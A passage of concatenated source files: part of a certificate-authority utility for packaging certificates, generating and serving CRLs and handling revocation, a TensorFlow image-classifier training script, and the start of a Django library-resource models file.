        if config.CA_IMPL == 'cfssl':
            crl = ca_impl.gencrl([], cacert.as_pem(), pk_str)
        elif config.CA_IMPL == 'openssl':
            crl = ca_impl.gencrl([], cacert.as_pem(), str(priv[0]['ca']))
        else:
            raise Exception("Unknown CA implementation: %s" % config.CA_IMPL)
        if isinstance(crl, str):
            crl = crl.encode('utf-8')
        with open('cacrl.der', 'wb') as f:
            f.write(crl)
        convert_crl_to_pem("cacrl.der", "cacrl.pem")
        # Sanity checks...
        cac = X509.load_cert('cacert.crt')
        if cac.verify():
            logger.info("CA certificate created successfully in %s" %
                        workingdir)
        else:
            logger.error("ERROR: Cert does not self validate")
    finally:
        os.chdir(cwd)
def cmd_certpkg(workingdir, name, insecure=False):
    """Bundle the cert material for *name* into <name>-pkg.zip.

    Returns (pkg, serial, subject): *pkg* is an in-memory zip (stored,
    not compressed, to avoid extraction errors in tmpfs) that always
    contains the UNPROTECTED private key. The zip written to disk
    contains the password-protected key, unless *insecure* is True, in
    which case the unprotected package is written verbatim.
    """
    cwd = os.getcwd()
    try:
        config.ch_dir(workingdir, logger)
        # zip up the crt, private key, and public key
        with open('cacert.crt', 'r') as f:
            cacert = f.read()
        with open("%s-public.pem" % name, 'r') as f:
            pub = f.read()
        with open("%s-cert.crt" % name, 'r') as f:
            cert = f.read()
        with open('cacrl.der', 'rb') as f:
            crl = f.read()
        with open('cacrl.pem', 'r') as f:
            crlpem = f.read()
        cert_obj = X509.load_cert_string(cert)
        serial = cert_obj.get_serial_number()
        subject = str(cert_obj.get_subject())
        priv = read_private()
        private = priv[0][name]
        with open("%s-private.pem" % name, 'r') as f:
            prot_priv = f.read()
        # code to create a pem formatted protected private key using the keystore password
        # pk = EVP.load_key_string(str(priv[0][name]))
        # f = BIO.MemoryBuffer()
        # # globalcb will return the global password provided by the user
        # pk.save_key_bio(f, 'aes_256_cbc', globalcb)
        # prot_priv = f.getvalue()
        # f.close()
        # no compression to avoid extraction errors in tmpfs
        sf = io.BytesIO()
        with zipfile.ZipFile(sf, 'w', compression=zipfile.ZIP_STORED) as f:
            f.writestr('%s-public.pem' % name, pub)
            f.writestr('%s-cert.crt' % name, cert)
            f.writestr('%s-private.pem' % name, private)
            f.writestr('cacert.crt', cacert)
            f.writestr('cacrl.der', crl)
            f.writestr('cacrl.pem', crlpem)
        pkg = sf.getvalue()
        if insecure:
            logger.warning(
                "Unprotected private keys in cert package being written to disk")
            # BUGFIX: pkg is bytes (BytesIO.getvalue()), so the file must
            # be opened in binary mode; text mode ('w') raised TypeError.
            with open('%s-pkg.zip' % name, 'wb') as f:
                f.write(pkg)
        else:
            # actually output the package to disk with a protected private key
            with zipfile.ZipFile('%s-pkg.zip' % name, 'w', compression=zipfile.ZIP_STORED) as f:
                f.writestr('%s-public.pem' % name, pub)
                f.writestr('%s-cert.crt' % name, cert)
                f.writestr('%s-private.pem' % name, prot_priv)
                f.writestr('cacert.crt', cacert)
                f.writestr('cacrl.der', crl)
                f.writestr('cacrl.pem', crlpem)
        logger.info("Creating cert package for %s in %s-pkg.zip" %
                    (name, name))
        return pkg, serial, subject
    finally:
        os.chdir(cwd)
def convert_crl_to_pem(derfile, pemfile):
    """Produce *pemfile* from the DER CRL *derfile*.

    NOTE(review): when ca_implementation == 'openssl' this writes an
    EMPTY pem file and only shells out to the openssl CLI otherwise —
    the condition looks inverted relative to the function name; confirm
    against the cfssl code path before changing.
    """
    if config.get('general', 'ca_implementation') == 'openssl':
        with open(pemfile, 'w') as f:
            f.write("")
    else:
        cmd = ('openssl', 'crl', '-in', derfile, '-inform', 'der',
               '-out', pemfile)
        cmd_exec.run(cmd)
def get_crl_distpoint(cert_path):
    """Return the first CRL distribution point URI found in the cert at
    *cert_path*, or "" when the certificate has no such extension."""
    cert_text = X509.load_cert(cert_path).as_text()
    inside_section = False
    for raw_line in cert_text.split('\n'):
        stripped = raw_line.strip()
        if stripped.startswith("X509v3 CRL Distribution Points:"):
            inside_section = True
        if inside_section and stripped.startswith("URI:"):
            return stripped[4:]
    return ""
# to check: openssl crl -inform DER -text -noout -in cacrl.der
def cmd_revoke(workingdir, name=None, serial=None):
    """Revoke a certificate by *name* OR *serial* (exactly one of the two)
    and return the regenerated CRL as DER bytes.

    The serial is appended to the keystore's revoked_keys list and the
    CRL is rebuilt from the full list.
    """
    cwd = os.getcwd()
    try:
        config.ch_dir(workingdir, logger)
        priv = read_private()
        if name is not None and serial is not None:
            raise Exception(
                "You may not specify a cert and a serial at the same time")
        if name is None and serial is None:
            raise Exception("You must specify a cert or a serial to revoke")
        if name is not None:
            # load up the cert
            cert = X509.load_cert("%s-cert.crt" % name)
            serial = cert.get_serial_number()
        # convert serial to string
        serial = str(serial)
        # get the ca key cert and keys as strings
        with open('cacert.crt', 'r') as f:
            cacert = f.read()
        ca_pk = priv[0]['ca'].decode('utf-8')
        if serial not in priv[0]['revoked_keys']:
            priv[0]['revoked_keys'].append(serial)
        crl = ca_impl.gencrl(priv[0]['revoked_keys'], cacert, ca_pk)
        write_private(priv)
        # write out the CRL to the disk
        # NOTE(review): the new CRL is only written when cacrl.der already
        # exists and is non-empty (os.stat raises FileNotFoundError when it
        # is missing) — confirm this is intentional.
        if os.stat('cacrl.der').st_size:
            with open('cacrl.der', 'wb') as f:
                f.write(crl)
            convert_crl_to_pem("cacrl.der", "cacrl.pem")
    finally:
        os.chdir(cwd)
    return crl
# regenerate the crl without revoking anything
def cmd_regencrl(workingdir):
    """Regenerate the CRL from the stored revoked-serials list without
    revoking anything new; rewrites cacrl.der/cacrl.pem and returns the
    CRL bytes."""
    cwd = os.getcwd()
    try:
        config.ch_dir(workingdir, logger)
        priv = read_private()
        # get the ca key cert and keys as strings
        with open('cacert.crt', 'r') as f:
            cacert = f.read()
        # NOTE(review): str() on the (bytes) key yields "b'...'" on
        # Python 3, whereas cmd_revoke uses .decode('utf-8') — confirm
        # which form ca_impl.gencrl expects.
        ca_pk = str(priv[0]['ca'])
        crl = ca_impl.gencrl(priv[0]['revoked_keys'], cacert, ca_pk)
        write_private(priv)
        # write out the CRL to the disk
        with open('cacrl.der', 'wb') as f:
            f.write(crl)
        convert_crl_to_pem("cacrl.der", "cacrl.pem")
    finally:
        os.chdir(cwd)
    return crl
def cmd_listen(workingdir, cert_path):
    """Serve the CRL over HTTP and keep it current.

    Starts three long-running activities:
      1. a threaded HTTP server publishing cacrl.der on config.CRL_PORT,
      2. a daemon thread that re-issues the CRL when it is within 6 hours
         of its "Next Update" time (checked roughly hourly),
      3. a blocking loop awaiting revocation notifications; each one
         revokes the cert and republishes the CRL.
    """
    cwd = os.getcwd()
    try:
        config.ch_dir(workingdir, logger)
        # just load up the password for later
        read_private(True)
        serveraddr = ('', config.CRL_PORT)
        server = ThreadedCRLServer(serveraddr, CRLHandler)
        if os.path.exists('cacrl.der'):
            logger.info("Loading existing crl: %s" %
                        os.path.abspath("cacrl.der"))
            with open('cacrl.der', 'rb') as f:
                server.setcrl(f.read())
        t = threading.Thread(target=server.serve_forever)
        logger.info("Hosting CRL on %s:%d" %
                    (socket.getfqdn(), config.CRL_PORT))
        t.start()

        def check_expiration():
            """Hourly loop: regenerate the CRL when it expires soon."""
            logger.info("checking CRL for expiration every hour")
            while True:  # pylint: disable=R1702
                try:
                    if (os.path.exists('cacrl.der') and
                            os.stat('cacrl.der').st_size):
                        cmd = ('openssl', 'crl', '-inform', 'der', '-in',
                               'cacrl.der', '-text', '-noout')
                        retout = cmd_exec.run(cmd)['retout']
                        for line in retout:
                            line = line.strip()
                            if line.startswith(b"Next Update:"):
                                expire = datetime.datetime.strptime(
                                    line[13:].decode('utf-8'), "%b %d %H:%M:%S %Y %Z")
                                # check expiration within 6 hours
                                # (variable is misnamed: horizon is 6h, not 1h)
                                in1hour = datetime.datetime.utcnow() + datetime.timedelta(hours=6)
                                if expire <= in1hour:
                                    logger.info(
                                        "Certificate to expire soon %s, re-issuing" % expire)
                                    cmd_regencrl(workingdir)
                    # check a little less than every hour
                    time.sleep(3540)
                except KeyboardInterrupt:
                    logger.info("TERM Signal received, shutting down...")
                    # server.shutdown()
                    break

        t2 = threading.Thread(target=check_expiration)
        t2.setDaemon(True)
        t2.start()

        def revoke_callback(revocation):
            """Handle one revocation message: revoke the serial and republish."""
            json_meta = json.loads(revocation['meta_data'])
            serial = json_meta['cert_serial']
            if revocation.get('type', None) != 'revocation' or serial is None:
                logger.error("Unsupported revocation message: %s" % revocation)
                return
            logger.info("Revoking certificate: %s" % serial)
            server.setcrl(cmd_revoke(workingdir, None, serial))
        try:
            while True:
                try:
                    revocation_notifier.await_notifications(
                        revoke_callback, revocation_cert_path=cert_path)
                except Exception as e:
                    logger.exception(e)
                    logger.warning(
                        "No connection to revocation server, retrying in 10s...")
                    time.sleep(10)
        except KeyboardInterrupt:
            logger.info("TERM Signal received, shutting down...")
            server.shutdown()
            sys.exit()
    finally:
        os.chdir(cwd)
class ThreadedCRLServer(ThreadingMixIn, HTTPServer):
    """HTTP server that handles each request on its own thread and serves
    the most recently published CRL from memory."""

    # Raw DER bytes of the CRL currently served; None until first publish.
    published_crl = None

    def setcrl(self, crl):
        """Publish *crl* (DER bytes) as the CRL returned to clients."""
        self.published_crl = crl
class CRLHandler(BaseHTTPRequestHandler):
    """Serves the in-memory CRL published on the owning ThreadedCRLServer."""

    def do_GET(self):
        """Reply 200 with the DER CRL bytes, or 404 when none is published."""
        logger.info('GET invoked from ' + str(self.client_address) + ' with uri:' + self.path)
        crl = self.server.published_crl
        if crl is None:
            self.send_response(404)
            self.end_headers()
            return
        # send back the CRL
        self.send_response(200)
        self.end_headers()
        self.wfile.write(crl)
def rmfiles(path):
    """Delete every file matching the glob pattern *path*."""
    for match in glob.glob(path):
        os.remove(match)
def write_private(inp):
    """Encrypt and persist the keystore.

    *inp* is a (priv_dict, salt) pair as returned by read_private(). The
    dict is YAML-dumped, encrypted with a key derived from the module-wide
    password, and written to private.yml with mode 0600.
    """
    priv = inp[0]
    salt = inp[1]
    global global_password
    priv_encoded = yaml.dump(priv, Dumper=SafeDumper)
    key = crypto.kdf(global_password, salt)
    ciphertext = crypto.encrypt(priv_encoded, key)
    towrite = {'salt': salt, 'priv': ciphertext}
    # 0600 so only the owner can read the (encrypted) keystore
    with os.fdopen(os.open('private.yml', os.O_WRONLY | os.O_CREAT, 0o600), 'w') as f:
        yaml.dump(towrite, f, Dumper=SafeDumper)
def read_private(warn=False):
    """Decrypt and return the keystore as a (priv_dict, salt) pair.

    Prompts for the keystore password on first use. When private.yml
    does not exist yet, returns an empty keystore with a freshly
    generated salt, logging a warning when *warn* is set.

    Raises an Exception when the stored blob cannot be decrypted with
    the supplied password.
    """
    global global_password
    if global_password is None:
        setpassword(getpass.getpass(
            "Please enter the password to decrypt your keystore: "))
    if os.path.exists('private.yml'):
        with open('private.yml', 'r') as f:
            toread = yaml.load(f, Loader=SafeLoader)
        key = crypto.kdf(global_password, toread['salt'])
        try:
            plain = crypto.decrypt(toread['priv'], key)
        except ValueError as e:
            raise Exception("Invalid password for keystore") from e
        return yaml.load(plain, Loader=SafeLoader), toread['salt']
    if warn:
        # file doesn't exist, just invent a salt
        logger.warning("Private certificate data %s does not exist yet." %
                       os.path.abspath("private.yml"))
        logger.warning(
            "Keylime will attempt to load private certificate data again when it is needed.")
    return {'revoked_keys': []}, base64.b64encode(crypto.generate_random_key()).decode()
def main(argv=sys.argv):
    """CLI entry point: dispatch init/create/pkg/revoke/listen commands.

    Without --dir, the default CA working directory is used, which may
    require root (config.REQUIRE_ROOT).
    """
    parser = argparse.ArgumentParser(argv[0])
    parser.add_argument('-c', '--command', action='store', dest='command',
                        required=True, help="valid commands are init,create,pkg,revoke,listen")
    parser.add_argument('-n', '--name', action='store',
                        help='the common name of the certificate to create')
    parser.add_argument('-d', '--dir', action='store',
                        help='use a custom directory to store certificates and keys')
    parser.add_argument('-i', '--insecure', action='store_true', default=False,
                        help='create cert packages with unprotected private keys and write them to disk. USE WITH CAUTION!')
    args = parser.parse_args(argv[1:])
    if args.dir is None:
        if os.getuid() != 0 and config.REQUIRE_ROOT:
            logger.error(
                "If you don't specify a working directory, this process must be run as root to access %s" % config.WORK_DIR)
            sys.exit(-1)
        workingdir = config.CA_WORK_DIR
    else:
        workingdir = args.dir
    if args.command == 'init':
        cmd_init(workingdir)
    elif args.command == 'create':
        if args.name is None:
            logger.error(
                "you must pass in a name for the certificate using -n (or --name)")
            parser.print_help()
            sys.exit(-1)
        cmd_mkcert(workingdir, args.name)
    elif args.command == 'pkg':
        if args.name is None:
            logger.error(
                "you must pass in a name for the certificate using -n (or --name)")
            parser.print_help()
            sys.exit(-1)
        cmd_certpkg(workingdir, args.name, args.insecure)
    elif args.command == 'revoke':
        if args.name is None:
            logger.error(
                "you must pass in a name for the certificate using -n (or --name)")
            parser.print_help()
            sys.exit(-1)
        # revoke-by-name only; revoke-by-serial is reachable via cmd_listen
        cmd_revoke(workingdir, args.name)
    elif args.command == 'listen':
        if args.name is None:
            args.name = os.path.join(workingdir, 'RevocationNotifier-cert.crt')
            logger.warning("using default name for revocation cert %s"
                           % args.name)
        cmd_listen(workingdir, args.name)
    else:
        logger.error("Invalid command: %s" % args.command)
        parser.print_help()
        sys.exit(-1)
|
train_model.py | import json
import random
import threading
import time
import numpy as np
import tensorflow.compat.v1 as tf
import tensorflow.keras as keras
import tensorflow.keras.layers as layers
import matplotlib.pyplot as plt
label_to_number_dict = None
number_to_label_dict = None
def load_dictionaries():
    """Populate the module-level label<->number lookup tables from disk."""
    global label_to_number_dict
    global number_to_label_dict
    with open("../Organizing/labels/label_to_number_dict.json", "r") as handle:
        label_to_number_dict = json.load(handle)
    with open("../Organizing/labels/number_to_label_dict.json", "r") as handle:
        number_to_label_dict = json.load(handle)
def get_current_train_pack_of_data(train_pack_number, size_string):
    """Return (features, labels) for a training pack.

    Prefers the in-memory preloaded copy when PRELOAD_DATA is active and
    a pack has already been loaded; otherwise reads the .npz files.
    """
    if PRELOAD_DATA and preloaded_train_feat is not None:
        return preloaded_train_feat, preloaded_train_labels
    base = "../DatasetBinaryStorage/" + size_string + "/train/"
    labels = np.load(base + "labels" + str(train_pack_number) + ".npz")['arr_0']
    features = np.load(base + "features" + str(train_pack_number) + ".npz")['arr_0']
    return features, labels
def get_current_validation_pack_of_data(validation_pack_number, size_string):
    """Return (features, labels) for a validation pack.

    Prefers the in-memory preloaded copy when PRELOAD_DATA is active and
    a pack has already been loaded; otherwise reads the .npz files.
    """
    if PRELOAD_DATA and preloaded_val_feat is not None:
        return preloaded_val_feat, preloaded_val_labels
    base = "../DatasetBinaryStorage/" + size_string + "/validate/"
    labels = np.load(base + "labels" + str(validation_pack_number) + ".npz")['arr_0']
    features = np.load(base + "features" + str(validation_pack_number) + ".npz")['arr_0']
    return features, labels
# When True, data packs are served from the in-memory buffers below
# instead of being re-read from disk each time.
PRELOAD_DATA = False
# Buffers filled asynchronously by the preload threads (None until loaded).
preloaded_val_feat = None
preloaded_val_labels = None
preloaded_train_feat = None
preloaded_train_labels = None
def target_preload_train(train_pack_number, size_string):
    """Thread target: load a training pack from disk into the preload buffers."""
    global preloaded_train_feat
    global preloaded_train_labels
    base = "../DatasetBinaryStorage/" + size_string + "/train/"
    preloaded_train_labels = np.load(base + "labels" + str(train_pack_number) + ".npz")['arr_0']
    preloaded_train_feat = np.load(base + "features" + str(train_pack_number) + ".npz")['arr_0']
def target_preload_validation(validation_pack_number, size_string):
    """Thread target: load a validation pack from disk into the preload buffers."""
    global preloaded_val_feat
    global preloaded_val_labels
    base = "../DatasetBinaryStorage/" + size_string + "/validate/"
    preloaded_val_labels = np.load(base + "labels" + str(validation_pack_number) + ".npz")['arr_0']
    preloaded_val_feat = np.load(base + "features" + str(validation_pack_number) + ".npz")['arr_0']
def preload_training_data(pack_number, size_string):
    """Start a background thread loading training pack *pack_number*.

    When preloading is active, the previously buffered arrays are freed
    first so peak memory stays bounded.
    """
    global preloaded_train_feat
    global preloaded_train_labels
    if PRELOAD_DATA:
        del preloaded_train_feat, preloaded_train_labels
    loader = threading.Thread(target=target_preload_train, args=[pack_number, size_string])
    loader.start()
def preload_validation_data(pack_number, size_string):
    """Start a background thread loading validation pack *pack_number*.

    When preloading is active, the previously buffered arrays are freed
    first so peak memory stays bounded.
    """
    global preloaded_val_feat
    global preloaded_val_labels
    if PRELOAD_DATA:
        del preloaded_val_feat, preloaded_val_labels
    loader = threading.Thread(target=target_preload_validation, args=[pack_number, size_string])
    loader.start()
def train_model(model, model_save_path, batch_size, train_pack_size,
                validation_pack_size, total_epochs, pack_epochs, width, height):
    """Drive training over rotating data packs until *total_epochs*.

    Data is split on disk into numbered "packs"; this loop shuffles the
    pack order, trains *pack_epochs* epochs per pack, optionally preloads
    the next pack on a background thread, and saves the model at roughly
    every 10% of total progress. With a single training pack it degrades
    to one plain core_train_model() call and returns its History.
    """
    global preloaded_train_feat
    global preloaded_train_labels
    global preloaded_val_labels
    global preloaded_val_feat
    # Initialize training parameters
    size = f"{width}x{height}"
    train_poz = -1
    validation_poz = -1
    current_epoch = 0
    train_indexes = [x for x in range(train_pack_size)]
    validation_indexes = [x for x in range(validation_pack_size)]
    random.shuffle(train_indexes)
    random.shuffle(validation_indexes)
    last_train_index = train_indexes[0]
    last_validation_index = validation_indexes[0]
    # Data arrays
    loaded_training_features = []
    loaded_training_labels = []
    loaded_validation_features = []
    loaded_validation_labels = []
    # threshold for saving the model
    next_threshold_checkpoint = 1
    threshold = total_epochs // 10 * next_threshold_checkpoint
    # If only one package is available for training
    if train_pack_size == 1:
        # Load Data Packets for Training
        loaded_training_features, loaded_training_labels = get_current_train_pack_of_data(train_indexes[train_poz],
                                                                                          size)
        loaded_validation_features, loaded_validation_labels = get_current_validation_pack_of_data(
            validation_indexes[validation_poz], size)
        # Train & Exit
        return core_train_model(model, model_save_path, loaded_training_features, loaded_training_labels,
                                loaded_validation_features, loaded_validation_labels, total_epochs, batch_size, True)
    # Print current queue for training
    print(train_indexes)
    print(validation_indexes)
    if PRELOAD_DATA:
        train_poz = 0
        validation_poz = 0
    time_x = time_z = time.time()
    while current_epoch < total_epochs:
        # Load & Preload Training Data Packages
        # NOTE(review): `if True:` looks like a leftover toggle mirroring the
        # validation-side condition below.
        if True:
            del loaded_training_features, loaded_training_labels
            train_poz += 1
            # Shuffle training queue
            if train_poz == train_pack_size:
                train_poz = 0
                random.shuffle(train_indexes)
                print(train_indexes)
            # Load Training Data
            loaded_training_features, loaded_training_labels = get_current_train_pack_of_data(
                train_indexes[train_poz - 1],
                size)
            # Preload Next Training Package
            preload_training_data(train_indexes[train_poz], size)
        # Load & Preload Validation Data Packages
        if validation_pack_size != 1:
            del loaded_validation_labels, loaded_validation_features
            validation_poz += 1
            # Shuffle validation queue
            if validation_poz == validation_pack_size:
                validation_poz = 0
                random.shuffle(validation_indexes)
                print(validation_indexes)
            # Load Validation Data
            loaded_validation_features, loaded_validation_labels = get_current_validation_pack_of_data(
                validation_indexes[validation_poz - 1], size)
            # Preload Next Validation Package
            preload_validation_data(validation_indexes[validation_poz], size)
        elif current_epoch == 0:
            # Load Validation Data (single validation pack: load once)
            loaded_validation_features, loaded_validation_labels = get_current_validation_pack_of_data(
                validation_indexes[validation_poz], size)
        # Update Save Checkpoint (save roughly every 10% of total epochs)
        save = False
        if current_epoch > threshold:
            save = True
            next_threshold_checkpoint += 1
            threshold = (total_epochs // 10) * next_threshold_checkpoint
        # Train model
        core_train_model(model, model_save_path, loaded_training_features, loaded_training_labels,
                         loaded_validation_features, loaded_validation_labels, pack_epochs, batch_size, save)
        # Update global epoch progress
        current_epoch += pack_epochs
        # Print Information about the Training Process
        print(f"\nGlobal Epochs: {current_epoch} / {total_epochs}")
        if not PRELOAD_DATA:
            print(f"Trained on pack [{train_indexes[train_poz]}]")
            print(f"Validated on pack [{validation_indexes[validation_poz]}]")
        else:
            # with preloading, the pack trained on lags one behind the index
            print(f"Trained on pack [{last_train_index}]")
            print(f"Validated on pack [{last_validation_index}]")
            last_train_index = train_indexes[train_poz]
            last_validation_index = validation_indexes[validation_poz]
        time_y = time.time()
        print(f"Training Session Time : {time_y - time_x}s")
        print(f"Total Training Time : {time_y - time_z}s")
        time_x = time_y
def get_premade_model(input_shape, outputs_number, lr):
    """Build a transfer-learning classifier on a frozen MobileNetV2 base.

    *input_shape* arrives as (width, height, channels) and is reordered
    to (height, width, channels) for the Keras backbone. Only the new
    dense head is trainable.
    """
    base_model = tf.keras.applications.MobileNetV2(input_shape=(input_shape[1],
                                                                input_shape[0],
                                                                input_shape[2]), include_top=False,
                                                   weights='imagenet')
    base_model.trainable = False  # freeze the pretrained backbone
    model = keras.Sequential(
        [
            base_model,
            keras.layers.AveragePooling2D(),
            keras.layers.Flatten(),
            keras.layers.Dense(64, activation="relu"),
            keras.layers.Dense(outputs_number, activation="softmax")
        ]
    )
    optimizer = keras.optimizers.Adam(learning_rate=lr)
    # NOTE(review): categorical_crossentropy here vs sparse variant in
    # get_model() — label encodings must match the chosen loss; confirm.
    model.compile(loss=tf.keras.losses.categorical_crossentropy, optimizer=optimizer, metrics=["accuracy"])
    return model
def core_train_model(model, model_save_path, train_features, train_labels, validation_features, validation_labels,
                     epochs, batch_size, save):
    """Fit *model* on one pack of data and optionally persist it.

    Returns the Keras History object from model.fit().
    """
    # lr_reduction = keras.callbacks.ReduceLROnPlateau(monitor='loss',)
    fit_history = model.fit(
        x=train_features,
        y=train_labels,
        validation_data=(validation_features, validation_labels),
        epochs=epochs,
        shuffle=True,
        batch_size=batch_size,
    )
    if save:
        model.save(model_save_path)
    return fit_history
def plot_model_history(model_history, name):
    """Plot accuracy and loss curves side by side and save the figure
    to ../Models&Learning/graphs/<name>.png before showing it."""
    fig, axs = plt.subplots(1, 2, figsize=(15, 5))
    panels = (
        (axs[0], 'acc', 'val_acc', 'Model Accuracy', 'accuracy'),
        (axs[1], 'loss', 'val_loss', 'Model Loss', 'loss'),
    )
    for axis, train_key, val_key, title, ylabel in panels:
        axis.plot(model_history[train_key])
        axis.plot(model_history[val_key])
        axis.set_title(title)
        axis.set_ylabel(ylabel)
        axis.set_xlabel('epoch')
        axis.legend(['train', 'validation'], loc='best')
    plt.savefig("../Models&Learning/graphs/" + name + ".png")
    plt.show()
def manage_history(model_history, save, load):
    """Convert a Keras History to plain lists, optionally merge with the
    on-disk "history" file (*load*), optionally rewrite that file
    (*save*), then plot the combined curves."""
    metric_keys = ('acc', 'val_acc', 'loss', 'val_loss')
    current = {key: [float(v) for v in model_history.history[key]]
               for key in metric_keys}
    if load:
        with open("history", "r") as f:
            previous = json.load(f)
        # append the new run's values after the stored ones
        for key in metric_keys:
            previous[key].extend(current[key])
        current = {key: previous[key] for key in metric_keys}
    if save:
        with open("history", "w+") as f:
            json.dump({key: current[key] for key in metric_keys}, f)
    plot_model_history(current, MODEL_NAME)
def rescale(x):
    """Normalize 8-bit pixel values from [0, 255] into [0.0, 1.0]."""
    pixel_max = 255.0
    return x / pixel_max
def hsv_and_grayscale(x):
    """Concatenate the HSV conversion of *x* with a single-channel
    reduction of it along the channel axis.

    NOTE(review): rgb_to_grayscale is applied to the HSV tensor ``y``,
    not to the original RGB input — possibly intended to be
    ``tf.image.rgb_to_grayscale(x)``; confirm before relying on this.
    """
    y = tf.image.rgb_to_hsv(x)
    return tf.concat([y, tf.image.rgb_to_grayscale(y)], axis=-1)
def hsv_and_normal(x):
    """Concatenate the RGB image with its HSV conversion (channel axis)."""
    hsv = tf.image.rgb_to_hsv(x)
    return tf.concat([x, hsv], axis=-1)
def greyscale_and_normal(x):
    """Concatenate the RGB image with its grayscale channel."""
    grey = tf.image.rgb_to_grayscale(x)
    return tf.concat([x, grey], axis=-1)
def grey_norm_hsv(x):
    """Concatenate RGB, grayscale and HSV representations (7 channels)."""
    grey = tf.image.rgb_to_grayscale(x)
    hsv = tf.image.rgb_to_hsv(x)
    return tf.concat([x, grey, hsv], axis=-1)
def flip_left_right(x):
    """Augmentation: randomly mirror the image horizontally."""
    flipped = tf.image.random_flip_left_right(x)
    return flipped
def flip_up_down(x):
    """Augmentation: randomly mirror the image vertically."""
    flipped = tf.image.random_flip_up_down(x)
    return flipped
def aug_brightness(x):
    """Augmentation: randomly shift brightness by up to +/-0.2."""
    max_delta = 0.2
    return tf.image.random_brightness(x, max_delta)
def rotation(x):
    """Augmentation: randomly rotate image *x* by up to 20 degrees.

    BUGFIX: the original called ``keras.preprocessing.random_rotation``,
    which does not exist (AttributeError); the function lives in the
    ``image`` submodule. Axis arguments assume a single channels-last
    (H, W, C) image — TODO confirm against the caller's data layout.
    """
    return keras.preprocessing.image.random_rotation(
        x, 20, row_axis=0, col_axis=1, channel_axis=2)
def get_model(input_shape, outputs_number, lr):
    """Build the from-scratch CNN classifier.

    The front of the network is data preprocessing done as Lambda layers:
    random flips (augmentation), channel stacking via grey_norm_hsv, and
    rescaling to [0, 1]; then three conv/pool stages and two dense layers.
    Compiled with SparseCategoricalCrossentropy, so labels are expected
    as integer class ids, not one-hot vectors.
    """
    model = tf.keras.Sequential()
    model.add(layers.InputLayer(input_shape=input_shape))
    # augmentation + channel engineering happen inside the graph
    model.add(layers.Lambda(flip_left_right))
    model.add(layers.Lambda(flip_up_down))
    model.add(layers.Lambda(grey_norm_hsv))
    model.add(layers.Lambda(rescale))
    model.add(layers.Conv2D(filters=64, kernel_size=(11, 11), padding="same", activation="relu"))
    model.add(layers.MaxPool2D(pool_size=(3, 3), strides=2))
    model.add(layers.Conv2D(filters=128, kernel_size=(5, 5), padding="same", activation="relu"))
    model.add(layers.MaxPool2D(pool_size=(3, 3), strides=2))
    model.add(layers.Conv2D(filters=256, kernel_size=(3, 3), activation="relu"))
    model.add(layers.Conv2D(filters=256, kernel_size=(3, 3), activation="relu"))
    model.add(layers.Conv2D(filters=256, kernel_size=(3, 3), activation="relu"))
    model.add(layers.MaxPool2D(pool_size=(3, 3), strides=2))
    model.add(layers.Flatten())
    model.add(layers.Dropout(0.5))
    model.add(layers.Dense(units=1024, activation="relu"))
    model.add(layers.Dropout(0.5))
    model.add(layers.Dense(units=1024, activation="relu"))
    model.add(layers.Dense(units=outputs_number, activation="softmax"))
    optimizer = keras.optimizers.Adam(learning_rate=lr)
    model.compile(loss=tf.keras.losses.SparseCategoricalCrossentropy(), optimizer=optimizer, metrics=["accuracy"])
    return model
def load_and_craft_model(input_shape, outputs_number, lr, path):
    """Load a previously saved Keras model from *path*.

    input_shape, outputs_number and lr are accepted only for signature
    parity with get_model()/get_premade_model(); they are unused here.
    """
    return keras.models.load_model(path)
if __name__ == '__main__':
    load_dictionaries()
    # Adam and Adamax
    # HYPER PARAMETERS
    MODEL_ID = 15
    WIDTH = 52
    HEIGHT = 64
    CHANNELS = 3
    BATCH_SIZE = 256
    LABELS = 262
    EPOCHS = 20
    PACK_EPOCHS = 1
    T_PACK_SIZE = 1
    V_PACK_SIZE = 1
    LR = 0.00025
    # These rebind the module-level flags (the guard runs at module scope).
    PRELOAD_DATA = False
    LOAD_MODEL = False
    SAVE_HISTORY = False
    LOAD_HISTORY = False
    MODEL_NAME = f"{WIDTH}x{HEIGHT}_ID{MODEL_ID}"
    size = f"{WIDTH}x{HEIGHT}"
    if LOAD_MODEL:
        model = load_and_craft_model((HEIGHT, WIDTH, CHANNELS), LABELS, LR, "new_gen_models/" + MODEL_NAME)
    else:
        # Build Model
        model = get_model((HEIGHT, WIDTH, CHANNELS), LABELS, LR)
    model.summary()
    # Train Model
    tf.executing_eagerly()
    history = train_model(model=model, model_save_path="new_gen_models/" + MODEL_NAME, batch_size=BATCH_SIZE,
                          width=WIDTH, height=HEIGHT, train_pack_size=T_PACK_SIZE, validation_pack_size=V_PACK_SIZE,
                          total_epochs=EPOCHS, pack_epochs=PACK_EPOCHS)
    manage_history(history, SAVE_HISTORY, LOAD_HISTORY)
|
models.py | """
models.py
ross spicer
updated 2015-04-29
contains the database models for the browser
"""
from django.db import models
from django.core.mail import send_mail, mail_admins
from django.core.exceptions import ValidationError
#
#~ from threading import Thread #didn't work on server
#~ from time import sleep
from datetime import tzinfo, timedelta, datetime
# for comparing time zone sensitive datetimes
ZERO = timedelta(0)
class UTC(tzinfo):
    """Concrete tzinfo for UTC: zero offset, zero DST, name "UTC"."""

    def utcoffset(self, dt):
        return timedelta(0)

    def tzname(self, dt):
        return "UTC"

    def dst(self, dt):
        return timedelta(0)
# Shared timezone-aware "now" reference used by RLibrary.clean().
utc = UTC()
class Resource(models.Model):
    """
    Base Resource model, so that all types have a common numbering system
    (every resource type shares the r_id sequence).
    """
    r_id = models.AutoField(primary_key = True) #auto generated
    title = models.CharField(max_length = 160, default='') # title
    description = models.TextField(blank=True) # description
    homepage = models.BooleanField(default = False) # should the resource
    # be shown on the home page
    show_in_browser = models.BooleanField(default = True) # for events
    # hidden as a user opt

    # NOTE(review): Python 2-style __unicode__; Python 3 Django uses
    # __str__ instead — confirm the target Django/Python version.
    def __unicode__(self):
        return self.title
class RLibrary(Resource):
"""
Library item database model
"""
phys_id = models.IntegerField(null=True) #no column in .xls file
author = models.CharField(max_length = 160) # author col in # .xls
# these are the types of items in the Physical Library, some have been
# combined from the .xls file
types = (
('0', 'Book'),
('1', 'DVD'),
('2', 'CD'),
('3', 'VHS'),
('4', 'Binder'),
('5', 'Manual'),
('6', 'Spiral Notebook'),
('7', 'Package(Book, DVD, et. al.)'),
('8', 'Cards'),
('9', 'Book w/ CD'),
('a', 'Activity Book'),
('b', 'Kit'),
('c', 'Various'),
('d', 'Catalogue'),
('e', 'Computer Game'),
('f', 'Watch/Timer'),
)
item_type = models.CharField(max_length=1, choices=types) #Item col in .xls
# The Catagories for Items in the phyiscal libaray
cats = ( #categories in the .xls file
